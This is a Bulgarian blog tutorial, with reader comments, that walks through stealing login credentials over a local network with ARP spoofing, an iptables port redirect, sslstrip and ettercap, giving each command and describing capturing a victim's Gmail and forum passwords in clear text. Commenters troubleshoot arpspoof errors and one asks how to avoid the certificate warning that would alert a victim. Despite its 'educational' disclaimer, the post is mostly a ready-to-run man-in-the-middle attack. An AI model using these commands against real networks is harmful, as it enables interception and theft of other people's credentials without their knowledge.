SSL Hijacking- Видео демонстрация

Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.

Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.

Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа

Избираме потребител с IP адрес 192.168.1.100

Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и  редактираме /etc/etter.conf

Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward

Сега пренасочваме порт 80 към 10 000 с iptables

iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Сега изпълняваме arp спуфинг

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

В терминал две стартираме sslstrip с аргумент -a -k -f

sslstrip -a -k -f

И в терминал 3 стартираме ettercap за да видим резултата от всичко това 🙂

ettercap -T -q -i eth0

Хайде сега да наблюдаваме машината на потребителя

Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com

Въвежда примерно потребителско име и парола

Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя  въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.

По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.

Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.

Видео демонстрация SSL Hijacking:

1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)
SSL Hijacking- Видео демонстрация, 5.0 out of 5 based on 1 rating

5 thoughts on “SSL Hijacking- Видео демонстрация”

  1. Здравей, как можем да си защитим компютъра от такъв вид прослушване?

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  2. Здравейте.Подкарах Бактрак 4 с Виртуалбокс,имах доста проблеми с пускането на нета,но с приятелска помощ успяхме.Направих няколко опита SSL Hijacking с учебна цел като следвам стапка по стапка всичко както е показано,но в терминал 1 при командата arpspoof -i eth0 -t 192.168.1.160 (IP на моя гейтуей) всеки път ми изписва arpspoof: couldn't arp for host 192.168.160 Някой може ли да ми каже защо се получава така?Да не баркам аз някаде,но всичко го изпалнявам както е показано.Пробвах и с други IP-та и пак сащото ми изписва.На видео материала не излиза такова нещо след изпалнение на тази команда.Следователно има нещо нередно.Благодаря предварително

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  3. При мен работи.но го правя на ВИФИ карта,,не на лан,,,защото си мисля че ако го направя с лан картата на гейтуей ми,,И-нет доставчика ми ще ми спре нета точно за 5мин. Доста заявки започват да минават през компа ми ,а доставчика си има защити 🙂
    Но да кажа че и на мен понякога ми исписва "couldn't arp for host",,нямам предства какво е!! но порових малко из иу-тубе.ком и намерих доста по лесен начин за "снифинг",,директно с програма и бутони ето : http://www.youtube.com/profile?feature=iv&annotation_id=annotation_948913&user=H34dcr4b#p/u/14/Iiq1VSg_dyw

    по лесно е,,без писане 🙂

    Л.М. Мартине,дето има една дума "заеба" го тоя блог,,,или по точно не отговаряш на потребителите за които си направил този блог

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)
  4. Ivoo линка ти към youtube.com е вече неактивен 🙂

    Имам въпрос, тествам точно това за курсова работа по "Мрежова Сигурност"
    Всичко тръгна повече от добре на виртуалната машина всички тестове минаха успешно, но искам да изключа снифенето на https въобще когато има заявка към страница https да я пропуска, причината е невалидният сертификат който трябва да приеме потребителят. Та самият въпрос е: как да се снифи трафика без SSL и да не изкарва на потребителя съобщението за приемане на невалидният сертификат. Т.е стигнем ли до SLL заявка да я пропуска и да се използва оригиналният сертификат (целта на теста е обикновенният трафик, а не този през SSL)

    VA:F [1.9.22_1171]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)

Вашият коментар

Вашият email адрес няма да бъде публикуван Задължителните полета са отбелязани с *